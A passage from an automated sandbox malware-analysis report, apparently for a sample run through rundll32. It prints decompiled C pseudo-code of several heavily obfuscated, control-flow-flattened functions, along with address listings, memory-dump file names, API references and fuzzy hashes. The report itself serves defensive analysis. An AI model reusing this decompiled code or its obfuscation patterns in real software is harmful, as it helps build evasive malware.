				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) << 0xf;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xad47a309;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) * 0x3d;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xa7019983;
				 *(_t426 + 0x80) = 0xaf4918;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) + 0x655a;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) ^ 0x00a67f7b;
				 *(_t426 + 0x78) = 0xd8d1b1;
				 *(_t426 + 0x78) =  *(_t426 + 0x78) * 0x42;
				 *(_t426 + 0x78) =  *(_t426 + 0x78) ^ 0x37ebe9ce;
				while(1) {
					L1:
					_t347 = 0xfb52c5;
					L2:
					while(_t374 != 0xd963e9) {
						if(_t374 == _t347) {
							_t350 = E002EC264( *((intOrPtr*)(_t426 + 0xbc)), _t372,  *(_t426 + 0x3c), _t426 + 0xac,  *((intOrPtr*)(_t426 + 0xa4)), _t374, _t374, _t420,  *(_t426 + 0x68), _t374,  *(_t426 + 0x48),  *(_t426 + 0xa0), _t411);
							_t426 = _t426 + 0x2c;
							__eflags = _t350;
							if(_t350 == 0) {
								_t351 =  *(_t426 + 0xa0);
							} else {
								_t422 = _t411;
								while(1) {
									__eflags = _t422[1] - 4;
									if(_t422[1] != 4) {
										goto L20;
									}
									L19:
									_t355 = E002DB23C( *(_t426 + 0x38),  *(_t426 + 0x30), _t424,  *(_t426 + 0x94),  *(_t426 + 0x20),  &(_t422[3]));
									_t426 = _t426 + 0x10;
									__eflags = _t355;
									if(_t355 == 0) {
										_t351 = 1;
										 *(_t426 + 0xa0) = 1;
									} else {
										goto L20;
									}
									L25:
									_t420 =  *(_t426 + 0x6c);
									goto L26;
									L20:
									_t353 =  *_t422;
									__eflags = _t353;
									if(_t353 == 0) {
										_t351 =  *(_t426 + 0xa0);
									} else {
										_t422 = _t422 + _t353;
										__eflags = _t422[1] - 4;
										if(_t422[1] != 4) {
											goto L20;
										}
									}
									goto L25;
								}
							}
							L26:
							__eflags = _t351;
							if(__eflags == 0) {
								_t347 = 0xfb52c5;
								_t374 = 0xfb52c5;
								continue;
							} else {
								_t407 =  *0x2f3e0c; // 0x0
								E002E458F( *(_t426 + 0x64),  *((intOrPtr*)(_t407 + 8)),  *(_t426 + 0x34));
								_t374 = 0xd963e9;
								goto L1;
							}
							L32:
						} else {
							if(_t374 == 0x247652d) {
								_t360 = E002D8F65( *(_t426 + 0x68),  *(_t426 + 0x34), _t426 + 0xb4,  *(_t426 + 0x9c), 0x2000000, _t374, 1,  *(_t426 + 0x80),  *((intOrPtr*)(_t426 + 0xa4)),  *(_t426 + 0x6c), _t374,  *(_t426 + 0x30) | 0x00000006);
								_t372 = _t360;
								_t426 = _t426 + 0x28;
								__eflags = _t360 - 0xffffffff;
								if(__eflags != 0) {
									_t374 = 0x7db0050;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								}
							} else {
								if(_t374 == 0x4334ccc) {
									E002EDA22( *(_t426 + 0x28),  *(_t426 + 0x64), __eflags,  *(_t426 + 0x68), _t426 + 0xac, _t374,  *(_t426 + 0x48));
									_t364 = E002DB6CF(_t426 + 0xbc,  *((intOrPtr*)(_t426 + 0xac)),  *(_t426 + 0x34),  *(_t426 + 0x48));
									_t424 = _t364;
									_t426 = _t426 + 0x18;
									_t374 = 0x247652d;
									 *((short*)(_t364 - 2)) = 0;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								} else {
									if(_t374 == 0x7db0050) {
										_t420 = 0x1000;
										_push(_t374);
										_push(_t374);
										 *(_t426 + 0x74) = 0x1000;
										_t411 = E002D7FF2(0x1000);
										_t347 = 0xfb52c5;
										__eflags = _t411;
										_t374 =  !=  ? 0xfb52c5 : 0xf828486;
										continue;
									} else {
										if(_t374 == 0xebf23c2) {
											_t374 = 0x4334ccc;
											continue;
										} else {
											if(_t374 != 0xf828486) {
												L30:
												__eflags = _t374 - 0x24bb42a;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												E002E1E67( *(_t426 + 0x94),  *(_t426 + 0x48),  *(_t426 + 0x88),  *(_t426 + 0x7c), _t372);
											}
										}
									}
								}
							}
						}
						return 0;
						goto L32;
					}
					E002E8519( *(_t426 + 0x68),  *(_t426 + 0x74), _t411);
					_t374 = 0xf828486;
					_t347 = 0xfb52c5;
					goto L30;
				}
			}






















                                                                                                                                  0x002d81bd
                                                                                                                                  0x002d81c7
                                                                                                                                  0x002d81cf
                                                                                                                                  0x002d81d4
                                                                                                                                  0x002d81dc
                                                                                                                                  0x002d81e4
                                                                                                                                  0x002d81f3
                                                                                                                                  0x002d81f8
                                                                                                                                  0x002d81fe
                                                                                                                                  0x002d8206
                                                                                                                                  0x002d820e
                                                                                                                                  0x002d8219
                                                                                                                                  0x002d8224
                                                                                                                                  0x002d822f
                                                                                                                                  0x002d8237
                                                                                                                                  0x002d823c
                                                                                                                                  0x002d8241
                                                                                                                                  0x002d8246
                                                                                                                                  0x002d824e
                                                                                                                                  0x002d825b
                                                                                                                                  0x002d825c
                                                                                                                                  0x002d8264
                                                                                                                                  0x002d8268
                                                                                                                                  0x002d8270
                                                                                                                                  0x002d8278
                                                                                                                                  0x002d8280
                                                                                                                                  0x002d828e
                                                                                                                                  0x002d8292
                                                                                                                                  0x002d829a
                                                                                                                                  0x002d82a2
                                                                                                                                  0x002d82aa
                                                                                                                                  0x002d82af
                                                                                                                                  0x002d82b7
                                                                                                                                  0x002d82c2
                                                                                                                                  0x002d82ca
                                                                                                                                  0x002d82d5
                                                                                                                                  0x002d82dd
                                                                                                                                  0x002d82e2
                                                                                                                                  0x002d82ea
                                                                                                                                  0x002d82f2
                                                                                                                                  0x002d82fa
                                                                                                                                  0x002d8307
                                                                                                                                  0x002d830b
                                                                                                                                  0x002d8313
                                                                                                                                  0x002d831b
                                                                                                                                  0x002d8323
                                                                                                                                  0x002d832b
                                                                                                                                  0x002d8333
                                                                                                                                  0x002d8338
                                                                                                                                  0x002d8340
                                                                                                                                  0x002d8348
                                                                                                                                  0x002d8355
                                                                                                                                  0x002d8359
                                                                                                                                  0x002d8361
                                                                                                                                  0x002d8369
                                                                                                                                  0x002d8371
                                                                                                                                  0x002d8376
                                                                                                                                  0x002d837e
                                                                                                                                  0x002d8386
                                                                                                                                  0x002d838b
                                                                                                                                  0x002d8393
                                                                                                                                  0x002d839b
                                                                                                                                  0x002d83a8
                                                                                                                                  0x002d83ac
                                                                                                                                  0x002d83b4
                                                                                                                                  0x002d83bc
                                                                                                                                  0x002d83c6
                                                                                                                                  0x002d83ce
                                                                                                                                  0x002d83d6
                                                                                                                                  0x002d83de
                                                                                                                                  0x002d83e6
                                                                                                                                  0x002d83eb
                                                                                                                                  0x002d83f3
                                                                                                                                  0x002d83fb
                                                                                                                                  0x002d8403
                                                                                                                                  0x002d8412
                                                                                                                                  0x002d8415
                                                                                                                                  0x002d8419
                                                                                                                                  0x002d8421
                                                                                                                                  0x002d842c
                                                                                                                                  0x002d8437
                                                                                                                                  0x002d8442
                                                                                                                                  0x002d844a
                                                                                                                                  0x002d844f
                                                                                                                                  0x002d8457
                                                                                                                                  0x002d845f
                                                                                                                                  0x002d8467
                                                                                                                                  0x002d846f
                                                                                                                                  0x002d847f
                                                                                                                                  0x002d8483
                                                                                                                                  0x002d848b
                                                                                                                                  0x002d8493
                                                                                                                                  0x002d849b
                                                                                                                                  0x002d84a0
                                                                                                                                  0x002d84a8
                                                                                                                                  0x002d84bb
                                                                                                                                  0x002d84be
                                                                                                                                  0x002d84c5
                                                                                                                                  0x002d84d0
                                                                                                                                  0x002d84e0
                                                                                                                                  0x002d84e4
                                                                                                                                  0x002d84ec
                                                                                                                                  0x002d84f4
                                                                                                                                  0x002d84fc
                                                                                                                                  0x002d8504
                                                                                                                                  0x002d8510
                                                                                                                                  0x002d8515
                                                                                                                                  0x002d851b
                                                                                                                                  0x002d8520
                                                                                                                                  0x002d8528
                                                                                                                                  0x002d8533
                                                                                                                                  0x002d853e
                                                                                                                                  0x002d8549
                                                                                                                                  0x002d8555
                                                                                                                                  0x002d8558
                                                                                                                                  0x002d855c
                                                                                                                                  0x002d8561
                                                                                                                                  0x002d8566
                                                                                                                                  0x002d856e
                                                                                                                                  0x002d8576
                                                                                                                                  0x002d8580
                                                                                                                                  0x002d8584
                                                                                                                                  0x002d858c
                                                                                                                                  0x002d8594
                                                                                                                                  0x002d8599
                                                                                                                                  0x002d85a1
                                                                                                                                  0x002d85a6
                                                                                                                                  0x002d85ae
                                                                                                                                  0x002d85b6
                                                                                                                                  0x002d85c0
                                                                                                                                  0x002d85c4
                                                                                                                                  0x002d85c8
                                                                                                                                  0x002d85cc
                                                                                                                                  0x002d85d0
                                                                                                                                  0x002d85d4
                                                                                                                                  0x002d85dc
                                                                                                                                  0x002d85e4
                                                                                                                                  0x002d85ec
                                                                                                                                  0x002d85f4
                                                                                                                                  0x002d8607
                                                                                                                                  0x002d860e
                                                                                                                                  0x002d8619
                                                                                                                                  0x002d8621
                                                                                                                                  0x002d8626
                                                                                                                                  0x002d8633
                                                                                                                                  0x002d8637
                                                                                                                                  0x002d863f
                                                                                                                                  0x002d864a
                                                                                                                                  0x002d8655
                                                                                                                                  0x002d8660
                                                                                                                                  0x002d866d
                                                                                                                                  0x002d8671
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d8679
                                                                                                                                  0x00000000
                                                                                                                                  0x002d867e
                                                                                                                                  0x002d868c
                                                                                                                                  0x002d8806
                                                                                                                                  0x002d880b
                                                                                                                                  0x002d880e
                                                                                                                                  0x002d8810
                                                                                                                                  0x002d8854
                                                                                                                                  0x002d8812
                                                                                                                                  0x002d8812
                                                                                                                                  0x002d8814
                                                                                                                                  0x002d8814
                                                                                                                                  0x002d8818
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d881a
                                                                                                                                  0x002d8832
                                                                                                                                  0x002d8837
                                                                                                                                  0x002d883a
                                                                                                                                  0x002d883c
                                                                                                                                  0x002d884a
                                                                                                                                  0x002d884b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8864
                                                                                                                                  0x002d8864
                                                                                                                                  0x00000000
                                                                                                                                  0x002d883e
                                                                                                                                  0x002d883e
                                                                                                                                  0x002d8840
                                                                                                                                  0x002d8842
                                                                                                                                  0x002d885d
                                                                                                                                  0x002d8844
                                                                                                                                  0x002d8844
                                                                                                                                  0x002d8814
                                                                                                                                  0x002d8818
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8818
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8842
                                                                                                                                  0x002d8814
                                                                                                                                  0x002d8868
                                                                                                                                  0x002d8868
                                                                                                                                  0x002d886a
                                                                                                                                  0x002d888d
                                                                                                                                  0x002d8892
                                                                                                                                  0x00000000
                                                                                                                                  0x002d886c
                                                                                                                                  0x002d8870
                                                                                                                                  0x002d887d
                                                                                                                                  0x002d8883
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8883
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8692
                                                                                                                                  0x002d8698
                                                                                                                                  0x002d87b9
                                                                                                                                  0x002d87be
                                                                                                                                  0x002d87c0
                                                                                                                                  0x002d87c3
                                                                                                                                  0x002d87c6
                                                                                                                                  0x002d87cc
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d8679
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d869e
                                                                                                                                  0x002d86a4
                                                                                                                                  0x002d874a
                                                                                                                                  0x002d8765
                                                                                                                                  0x002d876a
                                                                                                                                  0x002d876c
                                                                                                                                  0x002d8771
                                                                                                                                  0x002d8776
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d8679
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d86aa
                                                                                                                                  0x002d86b0
                                                                                                                                  0x002d86ff
                                                                                                                                  0x002d870e
                                                                                                                                  0x002d870f
                                                                                                                                  0x002d8710
                                                                                                                                  0x002d871a
                                                                                                                                  0x002d871c
                                                                                                                                  0x002d8722
                                                                                                                                  0x002d8729
                                                                                                                                  0x00000000
                                                                                                                                  0x002d86b2
                                                                                                                                  0x002d86b8
                                                                                                                                  0x002d86f4
                                                                                                                                  0x00000000
                                                                                                                                  0x002d86ba
                                                                                                                                  0x002d86c0
                                                                                                                                  0x002d88b2
                                                                                                                                  0x002d88b2
                                                                                                                                  0x002d88b8
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d88be
                                                                                                                                  0x002d86c6
                                                                                                                                  0x002d86dd
                                                                                                                                  0x002d86e2
                                                                                                                                  0x002d86c0
                                                                                                                                  0x002d86b8
                                                                                                                                  0x002d86b0
                                                                                                                                  0x002d86a4
                                                                                                                                  0x002d8698
                                                                                                                                  0x002d86f1
                                                                                                                                  0x00000000
                                                                                                                                  0x002d86f1
                                                                                                                                  0x002d88a2
                                                                                                                                  0x002d88a8
                                                                                                                                  0x002d88ad
                                                                                                                                  0x00000000
                                                                                                                                  0x002d88ad

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Q$/&X$Lz$N'`$S,I$Ze$q_
                                                                                                                                  • API String ID: 0-1837206032
                                                                                                                                  • Opcode ID: d1e41e8ef5e801ec9708898aff3e536e452fb137e050c35b12e027b904cf4b9c
                                                                                                                                  • Instruction ID: 46f93492d4d395c41652d8c8c183db9814e03ae9262db643a20f3bd203dab54b
                                                                                                                                  • Opcode Fuzzy Hash: d1e41e8ef5e801ec9708898aff3e536e452fb137e050c35b12e027b904cf4b9c
                                                                                                                                  • Instruction Fuzzy Hash: 02022F711183819FD368CF25C48AA5BBBE1FBC4758F508A1DF69A86260DBB4C949CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DE2CC Relevance: 8.9, Strings: 7, Instructions: 178COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E002DE2CC(void* __edx, intOrPtr _a8, intOrPtr _a12) {
				char _v556;
				intOrPtr _v576;
				char _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				void* __ecx;
				void* _t136;
				void* _t151;
				signed int _t153;
				signed int _t156;
				void* _t162;
				signed int _t167;
				intOrPtr _t187;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int* _t196;

				_push(_a12);
				_t187 = _a8;
				_push(_t187);
				_push(E002D8E4D);
				_push(__edx);
				E002E20B9(_t136);
				_v608 = 0x1ac257;
				_t196 =  &(( &_v652)[5]);
				_v608 = _v608 ^ 0x78a3296c;
				_v608 = _v608 ^ 0x78b9eb39;
				_t162 = 0xac58df2;
				_v624 = 0x387e66;
				_t9 =  &_v624; // 0x387e66
				_t188 = 0x2e;
				_v624 =  *_t9 * 0x13;
				_v624 = _v624 / _t188;
				_v624 = _v624 ^ 0x001972d5;
				_v644 = 0x433552;
				_v644 = _v644 + 0xffffa6b6;
				_v644 = _v644 ^ 0x94defa20;
				_v644 = _v644 << 1;
				_v644 = _v644 ^ 0x293db944;
				_v652 = 0xb70b59;
				_v652 = _v652 << 0xb;
				_v652 = _v652 + 0xffff8138;
				_t189 = 0x15;
				_v652 = _v652 / _t189;
				_v652 = _v652 ^ 0x08c5a62f;
				_v616 = 0xf4782f;
				_v616 = _v616 >> 0xa;
				_v616 = _v616 + 0xffff066a;
				_v616 = _v616 ^ 0xfff8c7bc;
				_v604 = 0x656560;
				_v604 = _v604 >> 3;
				_v604 = _v604 ^ 0x0000606f;
				_v648 = 0x377d9b;
				_t190 = 0x7f;
				_v648 = _v648 / _t190;
				_v648 = _v648 + 0xfd7f;
				_v648 = _v648 + 0xffff6b0a;
				_v648 = _v648 ^ 0x00006649;
				_v636 = 0x80cedd;
				_t191 = 0x58;
				_v636 = _v636 / _t191;
				_v636 = _v636 + 0x515e;
				_v636 = _v636 ^ 0x000b92de;
				_v620 = 0x65d9bd;
				_v620 = _v620 + 0xffff4b50;
				_v620 = _v620 ^ 0xd34cfccc;
				_v620 = _v620 ^ 0xd32e4bd2;
				_v632 = 0xb89e86;
				_v632 = _v632 + 0xffffcc79;
				_t192 = 0x2f;
				_v632 = _v632 / _t192;
				_v632 = _v632 ^ 0x00046a67;
				_v628 = 0xbb1c4a;
				_v628 = _v628 >> 6;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x000a4ee8;
				_v640 = 0xfd7114;
				_v640 = _v640 << 5;
				_v640 = _v640 * 0x45;
				_v640 = _v640 + 0xa2ea;
				_v640 = _v640 ^ 0x89e0c310;
				_v612 = 0x26e293;
				_v612 = _v612 >> 0xd;
				_v612 = _v612 ^ 0x00050986;
				_t193 = _v612;
				do {
					while(_t162 != 0x249e110) {
						if(_t162 == 0x48c9d54) {
							_v556 = 0x22c;
							_t153 = E002EC15D(_t193, _v652, _v616,  &_v556, _v604);
							_t196 =  &(_t196[3]);
							asm("sbb ecx, ecx");
							_t167 =  ~_t153 & 0xf758a92f;
							L13:
							_t162 = _t167 + 0xe63f1a5;
							continue;
						}
						if(_t162 == 0x5bc9ad4) {
							_t156 = E002D8E4D( &_v556,  &_v600);
							asm("sbb ecx, ecx");
							_t167 =  ~_t156 & 0xf3e5ef6b;
							goto L13;
						}
						if(_t162 == 0xac58df2) {
							_v576 = _t187;
							_t162 = 0xcf1a497;
							continue;
						}
						if(_t162 != 0xcf1a497) {
							if(_t162 == 0xe63f1a5) {
								return E002E1E67(_v632, _v628, _v640, _v612, _t193);
							}
							goto L18;
						}
						_push(_t162);
						_t156 = E002D5988(_t162, _v608);
						_t193 = _t156;
						if(_t156 != 0xffffffff) {
							_t162 = 0x48c9d54;
							continue;
						}
						L8:
						return _t156;
					}
					_t151 = E002D2A58(_v648, _t193,  &_v556, _v636, _v620);
					_t196 =  &(_t196[3]);
					if(_t151 == 0) {
						_t162 = 0xe63f1a5;
						goto L18;
					} else {
						_t162 = 0x5bc9ad4;
						continue;
					}
					goto L8;
					L18:
				} while (_t162 != 0xad68edc);
				return _t156;
			}

































                                                                                                                                  0x002de2d6
                                                                                                                                  0x002de2dd
                                                                                                                                  0x002de2e4
                                                                                                                                  0x002de2e5
                                                                                                                                  0x002de2ea
                                                                                                                                  0x002de2ec
                                                                                                                                  0x002de2f1
                                                                                                                                  0x002de2f9
                                                                                                                                  0x002de2fc
                                                                                                                                  0x002de306
                                                                                                                                  0x002de30e
                                                                                                                                  0x002de313
                                                                                                                                  0x002de31b
                                                                                                                                  0x002de322
                                                                                                                                  0x002de325
                                                                                                                                  0x002de331
                                                                                                                                  0x002de335
                                                                                                                                  0x002de33d
                                                                                                                                  0x002de345
                                                                                                                                  0x002de34d
                                                                                                                                  0x002de355
                                                                                                                                  0x002de359
                                                                                                                                  0x002de361
                                                                                                                                  0x002de369
                                                                                                                                  0x002de36e
                                                                                                                                  0x002de37a
                                                                                                                                  0x002de37f
                                                                                                                                  0x002de385
                                                                                                                                  0x002de38d
                                                                                                                                  0x002de395
                                                                                                                                  0x002de39a
                                                                                                                                  0x002de3a2
                                                                                                                                  0x002de3aa
                                                                                                                                  0x002de3b2
                                                                                                                                  0x002de3b7
                                                                                                                                  0x002de3bf
                                                                                                                                  0x002de3cb
                                                                                                                                  0x002de3d0
                                                                                                                                  0x002de3d6
                                                                                                                                  0x002de3de
                                                                                                                                  0x002de3e6
                                                                                                                                  0x002de3ee
                                                                                                                                  0x002de3fa
                                                                                                                                  0x002de3ff
                                                                                                                                  0x002de405
                                                                                                                                  0x002de40d
                                                                                                                                  0x002de415
                                                                                                                                  0x002de41d
                                                                                                                                  0x002de425
                                                                                                                                  0x002de42d
                                                                                                                                  0x002de435
                                                                                                                                  0x002de43d
                                                                                                                                  0x002de449
                                                                                                                                  0x002de44c
                                                                                                                                  0x002de450
                                                                                                                                  0x002de458
                                                                                                                                  0x002de460
                                                                                                                                  0x002de46a
                                                                                                                                  0x002de474
                                                                                                                                  0x002de47c
                                                                                                                                  0x002de484
                                                                                                                                  0x002de48e
                                                                                                                                  0x002de492
                                                                                                                                  0x002de49a
                                                                                                                                  0x002de4a2
                                                                                                                                  0x002de4aa
                                                                                                                                  0x002de4af
                                                                                                                                  0x002de4b7
                                                                                                                                  0x002de4bb
                                                                                                                                  0x002de4bb
                                                                                                                                  0x002de4c9
                                                                                                                                  0x002de56a
                                                                                                                                  0x002de57d
                                                                                                                                  0x002de582
                                                                                                                                  0x002de589
                                                                                                                                  0x002de58b
                                                                                                                                  0x002de55b
                                                                                                                                  0x002de55b
                                                                                                                                  0x00000000
                                                                                                                                  0x002de55b
                                                                                                                                  0x002de4d5
                                                                                                                                  0x002de54a
                                                                                                                                  0x002de553
                                                                                                                                  0x002de555
                                                                                                                                  0x00000000
                                                                                                                                  0x002de555
                                                                                                                                  0x002de4dd
                                                                                                                                  0x002de532
                                                                                                                                  0x002de536
                                                                                                                                  0x00000000
                                                                                                                                  0x002de536
                                                                                                                                  0x002de4e5
                                                                                                                                  0x002de4e9
                                                                                                                                  0x00000000
                                                                                                                                  0x002de505
                                                                                                                                  0x00000000
                                                                                                                                  0x002de4e9
                                                                                                                                  0x002de51b
                                                                                                                                  0x002de520
                                                                                                                                  0x002de525
                                                                                                                                  0x002de52c
                                                                                                                                  0x002de52e
                                                                                                                                  0x00000000
                                                                                                                                  0x002de52e
                                                                                                                                  0x002de512
                                                                                                                                  0x002de512
                                                                                                                                  0x002de512
                                                                                                                                  0x002de5a6
                                                                                                                                  0x002de5ab
                                                                                                                                  0x002de5b0
                                                                                                                                  0x002de5bc
                                                                                                                                  0x00000000
                                                                                                                                  0x002de5b2
                                                                                                                                  0x002de5b2
                                                                                                                                  0x00000000
                                                                                                                                  0x002de5b2
                                                                                                                                  0x00000000
                                                                                                                                  0x002de5be
                                                                                                                                  0x002de5be
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: If$R5C$^Q$`ee$f~8$o`$N
                                                                                                                                  • API String ID: 0-3572798563
                                                                                                                                  • Opcode ID: 1a668e16f1afb0189231fe901590b28768e61ec28d9c6243d1cf595df6961a24
                                                                                                                                  • Instruction ID: 4301a6f8d0f9e19b7bd22c9926c4afa94f1aa4ae1d5f1882b9cb835fb513c2e4
                                                                                                                                  • Opcode Fuzzy Hash: 1a668e16f1afb0189231fe901590b28768e61ec28d9c6243d1cf595df6961a24
                                                                                                                                  • Instruction Fuzzy Hash: 15718772518301DFC758DF22D88945FBBE1EBC4768F504A1EF4869A2A0D775CA19CF82
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10014B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                                    • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                                  • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                                    • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                                  • String ID: LOC
                                                                                                                                  • API String ID: 3864805678-519433814
                                                                                                                                  • Opcode ID: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                                  • Instruction ID: c6b9acf05ba5f485c5c472c95a6cc1a1d49ea65b07ecc8430683ae88ba63382e
                                                                                                                                  • Opcode Fuzzy Hash: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                                  • Instruction Fuzzy Hash: B011E471900118AFDB11DB64CC86BDD73B8EF09315F1241A1F7059F0A1EEB0E9859AD1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DCF47 Relevance: 7.9, Strings: 6, Instructions: 380COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002DCF47(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				char _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v88;
				char* _v92;
				char _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				void* _t345;
				void* _t377;
				void* _t378;
				void* _t386;
				void* _t393;
				intOrPtr _t403;
				intOrPtr* _t406;
				void* _t408;
				signed char* _t414;
				signed char* _t450;
				intOrPtr* _t455;
				intOrPtr _t456;
				intOrPtr _t457;
				void* _t458;
				signed char* _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				void* _t470;
				void* _t471;
				void* _t474;

				_t406 = _a8;
				_t456 = _a4;
				_push(_a20);
				_t455 = _a16;
				_push(_t455);
				_push(_a12);
				_push(_t406);
				_push(_t456);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t345);
				_v256 = 0xcf1dac;
				_t471 = _t470 + 0x1c;
				_v256 = _v256 ^ 0x662b1d0f;
				_v256 = _v256 << 2;
				_t408 = 0x8e80a37;
				_v256 = _v256 + 0xffff9089;
				_v256 = _v256 ^ 0x9b8f9315;
				_v160 = 0x25617a;
				_v160 = _v160 << 2;
				_v160 = _v160 ^ 0x009585a8;
				_v264 = 0x39e017;
				_v264 = _v264 + 0xffffbc9c;
				_v264 = _v264 ^ 0xb11c7ead;
				_v264 = _v264 + 0xffffd7b2;
				_v264 = _v264 ^ 0xb125b990;
				_v240 = 0xb82586;
				_t460 = 0x74;
				_v240 = _v240 / _t460;
				_v240 = _v240 << 1;
				_t461 = 0x3b;
				_v132 = _v132 & 0x00000000;
				_v240 = _v240 * 0x36;
				_v240 = _v240 ^ 0x00aace1a;
				_v180 = 0xcab8fe;
				_v180 = _v180 ^ 0xca9451c5;
